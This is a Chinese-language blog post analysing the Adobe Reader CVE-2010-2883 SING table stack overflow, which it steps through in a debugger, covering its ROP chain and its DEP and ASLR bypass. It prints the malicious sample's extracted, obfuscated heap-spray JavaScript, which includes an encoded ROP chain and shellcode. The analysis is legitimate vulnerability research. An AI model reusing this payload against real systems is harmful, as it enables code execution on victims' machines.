<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201104211542610.png" class="" title="image-20201104211542610">

<p>​	我们查看一下这个值中保存的内容，拿这个值跟上面通过010Edit查看到的值对比发现是一样的，可以判断这里存放的是SING表的数据。</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201104211659428.png" class="" title="image-20201104211659428">

<p>继续往下调试可以看到这里有个call，看一下参数明显是吧SING字符串当错参数传入进去了，F8步过继续往下调试。</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201109201540699.png" class="" title="image-20201109201540699">

<p>这里看一下eax的值可以比较一下跟SING表入口的数据是一样的，这样我们可以猜测上面那个call的作用是用来取出SING表的数据<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201109211515283.png" class="" title="image-20201109211515283"></p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201109215720617.png" class="" title="image-20201109215720617">

<p>再继续往下调试我们就能找到上面再IDA里面找到的溢出点。这里我们可以看一下传递给strcat的参数，通过对比发现这个地址存放的是uniquename。继续F8执行。</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201109233420281.png" class="" title="image-20201109233420281">

<p>执行strcat之后，会将<strong>58 E0 8D AD</strong> 起始的部分复制到ebp的指定地址（0x0012e4d8)，直至遇到NULL字符终止。我们对复制进去的这段数据（ebp指向的地址）设置内存访问断点，F9执行。</p>
<p>第一次断在字符串拷贝，每次拷贝一个字节，循环拷贝。</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201109235316562.png" class="" title="image-20201109235316562">

<p>第二个地方断在字符串开始的地方，每次比较一个字节。</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201109235551091.png" class="" title="image-20201109235551091">

<p>继续往下跟踪可以找到下图的位置，0x4A8A08E2是样本中的数据，该地址必须为可读可写的，否则会导致出现异常。</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110000836183.png" class="" title="image-20201110000836183">

<p>继续执行下去将看到下图所示的地址。此处的call [eax]指令，[eax]=0x4A80CB38 (icucnv36.4A80CB38)</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110001742314.png" class="" title="image-20201110001742314">

<p>此地址对应的指令为：</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110002213991.png" class="" title="image-20201110002213991">

<center>ROP指令1</center>

<p>返回之后：</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110002529870.png" class="" title="image-20201110002529870">

<center>ROP指令2</center>

<p>我们再来看下TTF流中的样本数据，可以找到上面基础关键跳转地址的踪影：</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110002842137.png" class="" title="image-20201110002842137">

<p>跳转地址的稳定性其实主要依靠0x4A82A714和0x4A80CB38这两处地址，他们都位于icucnv36这块地址空间内，而在Adove Reader的各个版本上，这个dll上的这两处地址是始终不变的，因而保持了各个版本的兼容性和Exploit的稳定性。上面的0C0C0C0C正式样本特意构造的，然后再通过嵌入到PDF的JavaScript实现Heap Spary，进而跳入Shellcode执行代码。0x0C0C0C0C正是绕过DEP的关键部分，它是利用ROP技术实现的。</p>
<p>借助PdfStreamDumper来提取样本中的JavaScript代码。</p>
<pre><code class="javascript">var qXtjjwuwMZHJFnHFHIeKMsuymSwbvdoCpVQWidsXxgdOevIIdJDueXNhhaFuWpjEXlNYkQBcmKusAxoTqqySheWldNrQ = unescape;
var TuBHhjKjSQNWxYdXhwSUaUeAfYLLCe = qXtjjwuwMZHJFnHFHIeKMsuymSwbvdoCpVQWidsXxgdOevIIdJDueXNhhaFuWpjEXlNYkQBcmKusAxoTqqySheWldNrQ( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%ue9bd%u49c0%udd6d%ud9c5%u2474%u5ff4%uc929%u31b1%u6f31%u8313%u04c7%u6f03%u22e6%u91bc%u2010%u6a3f%u45e0%u8fc9%u45d1%uc4ad%u7641%u89a5%ufd6d%u39eb%u73e6%u4d24%u394f%u6012%u1250%ue366%u69d2%uc3bb%ua1eb%u02ce%udf2c%u5623%uabe5%u4796%ue682%ue32a%ue7d8%u102a%u06a8%u871a%u50a3%u29bc%ue960%u31f5%ud465%uc94c%ua25d%u1b4e%u4bac%u62fc%ube01%ua3fc%u21a5%udd8b%udcd6%u198c%u3aa5%uba18%uc80d%u66ba%u1dac%uec5c%ueaa2%uaa2a%ueda6%uc0ff%u66d2%u06fe%u3c53%u8325%ue638%u9244%u49e4%uc478%u3547%u8edc%u2265%ucd6d%ub5e3%u6be3%ub541%u73fb%udef5%uf8ca%u999a%u2ad2%u56df%u7799%uff49%ue244%u62c8%ud877%u9b0e%ue9f4%u58ee%u9be4%u25eb%u70a2%u3681%u7747%u3636%u1442%ua4d9%uf50e%u4d7c%u09b4' );
var hgHbuigmqMHFYcMUUwDsvvjYkPfvUjrkVPHIsjcNtTOJnPRFAyDLZFSOaHVkMWXNIpaw = qXtjjwuwMZHJFnHFHIeKMsuymSwbvdoCpVQWidsXxgdOevIIdJDueXNhhaFuWpjEXlNYkQBcmKusAxoTqqySheWldNrQ( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (hgHbuigmqMHFYcMUUwDsvvjYkPfvUjrkVPHIsjcNtTOJnPRFAyDLZFSOaHVkMWXNIpaw.length + 20 + 8 &lt; 65536) hgHbuigmqMHFYcMUUwDsvvjYkPfvUjrkVPHIsjcNtTOJnPRFAyDLZFSOaHVkMWXNIpaw+=hgHbuigmqMHFYcMUUwDsvvjYkPfvUjrkVPHIsjcNtTOJnPRFAyDLZFSOaHVkMWXNIpaw;
AMdepunMDlBdcASwQxIXPGLFXVNQnQrUurHez = hgHbuigmqMHFYcMUUwDsvvjYkPfvUjrkVPHIsjcNtTOJnPRFAyDLZFSOaHVkMWXNIpaw.substring(0, (0x0c0c-0x24)/2);
AMdepunMDlBdcASwQxIXPGLFXVNQnQrUurHez += TuBHhjKjSQNWxYdXhwSUaUeAfYLLCe;
AMdepunMDlBdcASwQxIXPGLFXVNQnQrUurHez += hgHbuigmqMHFYcMUUwDsvvjYkPfvUjrkVPHIsjcNtTOJnPRFAyDLZFSOaHVkMWXNIpaw;
JXWEaKrHQPCtejKwqfCPofYNrtFlVIZGQrpuiwWQwWaCuEOfqQWTNslPPizGKncXoXwfgWiB = AMdepunMDlBdcASwQxIXPGLFXVNQnQrUurHez.substring(0, 65536/2);
while(JXWEaKrHQPCtejKwqfCPofYNrtFlVIZGQrpuiwWQwWaCuEOfqQWTNslPPizGKncXoXwfgWiB.length &lt; 0x80000) JXWEaKrHQPCtejKwqfCPofYNrtFlVIZGQrpuiwWQwWaCuEOfqQWTNslPPizGKncXoXwfgWiB += JXWEaKrHQPCtejKwqfCPofYNrtFlVIZGQrpuiwWQwWaCuEOfqQWTNslPPizGKncXoXwfgWiB;
GpzjaZkwEGsG = JXWEaKrHQPCtejKwqfCPofYNrtFlVIZGQrpuiwWQwWaCuEOfqQWTNslPPizGKncXoXwfgWiB.substring(0, 0x80000 - (0x1020-0x08) / 2);
var KkRYrQKZaeEulhPvabpTanhXVgnMmalrmTtKTmlkSrkkgM = new Array();
for (MHzOuXylamFYTUBOrCPPWcbkWJOMFnTFvtCRiJjNnptuQTlkQCNqlNGacncSxbbglbfBlfqsfqUHNE=0;MHzOuXylamFYTUBOrCPPWcbkWJOMFnTFvtCRiJjNnptuQTlkQCNqlNGacncSxbbglbfBlfqsfqUHNE&lt;0x1f0;MHzOuXylamFYTUBOrCPPWcbkWJOMFnTFvtCRiJjNnptuQTlkQCNqlNGacncSxbbglbfBlfqsfqUHNE++) KkRYrQKZaeEulhPvabpTanhXVgnMmalrmTtKTmlkSrkkgM[MHzOuXylamFYTUBOrCPPWcbkWJOMFnTFvtCRiJjNnptuQTlkQCNqlNGacncSxbbglbfBlfqsfqUHNE]=GpzjaZkwEGsG+"s";
</code></pre>
<p>当返回到栈顶（0C0C0C0C)后，栈的情况如下所示。</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110004506163.png" class="" title="image-20201110004506163">

<p>栈中的数据便是上面JS代码中的Shellcode，作者也正是利用它来实现ROP绕过DEP保护的。首先进入0x4A8063A5，然后再依次执行下面的ROP指令</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110004824363.png" class="" title="image-20201110004824363">

<center>ROP指令3</center>

<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110005023971.png" class="" title="image-20201110005023971">

<center>ROP指令4</center>

<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110005125716.png" class="" title="image-20201110005125716">

<center>构造CreaterFileA函数地址的ROP指令</center>

<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110005307611.png" class="" title="image-20201110005307611">

<center>调用CreateFileA函数</center>

<p>调用CreateFileA函数时,栈上对应的各个参数情况如图所示，它创建了一个名为iso88591的文件</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110005501083.png" class="" title="image-20201110005501083">

<p>返回之后，再通过跟上面相同的手法构造出ROP指令来调用CreateFileMapping,创建文件内存映射，调用CreateFileMapping时的栈中各个参数如下图</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110005720538.png" class="" title="image-20201110005720538">

<p>然后，执行MapViewOfFile函数</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110005847673.png" class="" title="image-20201110005847673">

<p>然后，再执行memcpy函数</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110010014506.png" class="" title="image-20201110010014506">

<p>其中目的地址就是前面MapViewOfFile返回的地址，而源地址就是真正的Shellcode代码，将他复制到一段可执行可读写的内存段，以此绕过DEP保护。由于构造的ROP指令均位于不受ASLR保护的icucnv36.dll模块，因此也可用于绕过ASLR保护。</p>

		</div>

		
		<div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
			<div class="article-copyright-info-container">
    <ul>
        <li><strong>标题:</strong> CVE-2010-2883 Adobe Reader TTF字体SING表栈溢出漏洞</li>
        <li><strong>作者:</strong> xiaoeryu</li>
        <li><strong>创建于
                :</strong> 2021-05-19 22:42:44</li>
        
            <li>
                <strong>更新于
                    :</strong> 2023-11-17 19:38:22
            </li>
        
        <li>
            <strong>链接:</strong> https://github.com/xiaoeryu/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF字体SING表栈溢出漏洞/
        </li>
        <li>
            <strong>
                版权声明:
            </strong>
            

            
                本文章采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a> 进行许可。
            
        </li>
    </ul>
</div>

		</div>
		

		
		<ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
			
			<li class="tag-item mx-0.5">
				<a href="/tags/Adobe-Reader%E6%BC%8F%E6%B4%9E/">#Adobe Reader漏洞</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">#漏洞分析</a>&nbsp;
			</li>
			
		</ul>
		

		

		
		<div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
			
			<div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="prev" rel="prev" href="/2021/05/19/mm%E6%9C%A8%E9%A9%AC%E5%88%86%E6%9E%90/">
					<span class="left arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-left"></i>
					</span>
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item">mm木马分析</span>
						<span class="post-nav-item">上一篇</span>
					</span>
				</a>
			</div>
			
			
			<div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="next" rel="next" href="/2021/05/19/CVE-2012-0158/">
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item">CVE-2012-0158</span>
						<span class="post-nav-item">下一篇</span>
					</span>
					<span class="right arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-right"></i>
					</span>
				</a>
			</div>
			
		</div>
		


		
		<div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
			<div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        评论
    </div>
    

        
            


        
    
</div>

		</div>
		
	</div>

	
	<div class="toc-content-container">
		<div class="post-toc-wrap">
	<div class="post-toc">
		<div class="toc-title">目录</div>
		<div class="page-title">CVE-2010-2883 Adobe Reader TTF字体SING表栈溢出漏洞</div>
		<ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x1%EF%BC%9A%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0"><span class="nav-text">0x1：漏洞描述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x2%EF%BC%9A%E5%88%86%E6%9E%90%E7%8E%AF%E5%A2%83"><span class="nav-text">0x2：分析环境</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x3%EF%BC%9A%E5%9F%BA%E4%BA%8E%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%AE%9A%E4%BD%8D%E7%9A%84%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E6%96%B9%E6%B3%95"><span class="nav-text">0x3：基于字符串定位的漏洞分析方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x4%EF%BC%9A%E6%A0%B7%E6%9C%ACExploit%E6%8A%80%E6%9C%AF%E5%88%86%E6%9E%90"><span class="nav-text">0x4：样本Exploit技术分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x05%EF%BC%9A%E5%8A%A8%E6%80%81%E8%B0%83%E8%AF%95"><span class="nav-text">0x05：动态调试</span></a></li></ol>

	</div>
</div>
	</div>
	
</div>
			</div>

			
		</div>

		<div class="main-content-footer">
			<footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2025&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">xiaoeryu</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        共撰写了 112 篇文章
                    </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">访问人数</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">总访问量</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">由 <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a> 驱动</span>
            <span class="text-sm lg:block">主题&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.8.2</a></span>
        </div>
        
        
            <div>
                博客已运行 <span class="odometer" id="runtime_days" ></span> 天 <span class="odometer" id="runtime_hours"></span> 小时 <span class="odometer" id="runtime_minutes"></span> 分钟 <span class="odometer" id="runtime_seconds"></span> 秒
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
		</div>
	</div>

	
	<div class="post-tools">
		<div class="post-tools-container">
	<ul class="article-tools-list">
		<!-- TOC aside toggle -->
		
		<li class="right-bottom-tools page-aside-toggle">
			<i class="fa-regular fa-outdent"></i>
		</li>
		

		<!-- go comment -->
		
		<li class="go-comment">
			<i class="fa-regular fa-comments"></i>
		</li>
		
	</ul>
</div>
	</div>
	

	<div class="right-side-tools-container">
		<div class="side-tools-container">
	<ul class="hidden-tools-list">
		<li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-plus"></i>
		</li>

		<li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-minus"></i>
		</li>

		<li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
			<i class="fa-regular fa-moon"></i>
		</li>

		<!-- rss -->
		

		

		<li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
			<i class="fa-regular fa-arrow-down"></i>
		</li>
	</ul>

	<ul class="visible-tools-list">
		<li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
			<i class="fa-regular fa-cog fa-spin"></i>
		</li>
		
		<li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
			<i class="arrow-up fas fa-arrow-up"></i>
			<span class="percent"></span>
		</li>
		
		
	</ul>
</div>
	</div>

	<div class="image-viewer-container">
	<img src="">
</div>

	
	<div class="search-pop-overlay">
	<div class="popup search-popup">
		<div class="search-header">
			<span class="search-input-field-pre">
				<i class="fa-solid fa-keyboard"></i>
			</span>
			<div class="search-input-container">
				<input autocomplete="off" autocorrect="off" autocapitalize="off" placeholder="站内搜索您需要的内容..." spellcheck="false" type="search" class="search-input">
			</div>
			<span class="popup-btn-close">
				<i class="fa-solid fa-times"></i>
			</span>
		</div>
		<div id="search-result">
			<div id="no-result">
				<i class="fa-solid fa-spinner fa-spin-pulse fa-5x fa-fw"></i>
			</div>
		</div>
	</div>
</div>
	

</main>



<script src="/js/build/libs/Swup.min.js"></script>

<script src="/js/build/libs/SwupSlideTheme.min.js"></script>

<script src="/js/build/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/build/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/build/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/build/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>




	
<script src="/js/build/tools/imageViewer.js" type="module"></script>

<script src="/js/build/utils.js" type="module"></script>

<script src="/js/build/main.js" type="module"></script>

<script src="/js/build/layouts/navbarShrink.js" type="module"></script>

<script src="/js/build/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/build/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/build/layouts/categoryList.js" type="module"></script>



    
<script src="/js/build/tools/localSearch.js" type="module"></script>




    
<script src="/js/build/tools/codeBlock.js" type="module"></script>




    
<script src="/js/build/layouts/lazyload.js" type="module"></script>




    
<script src="/js/build/tools/runtime.js"></script>

    
<script src="/js/build/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/build/libs/Typed.min.js"></script>

  
<script src="/js/build/plugins/typed.js" type="module"></script>








    
<script src="/js/build/libs/anime.min.js"></script>





    
<script src="/js/build/tools/tocToggle.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/layouts/toc.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/plugins/tabs.js" type="module" data-swup-reload-script=""></script>




<script src="/js/build/libs/moment-with-locales.min.js" data-swup-reload-script=""></script>


<script src="/js/build/layouts/essays.js" type="module" data-swup-reload-script=""></script>





	
</body>

</html>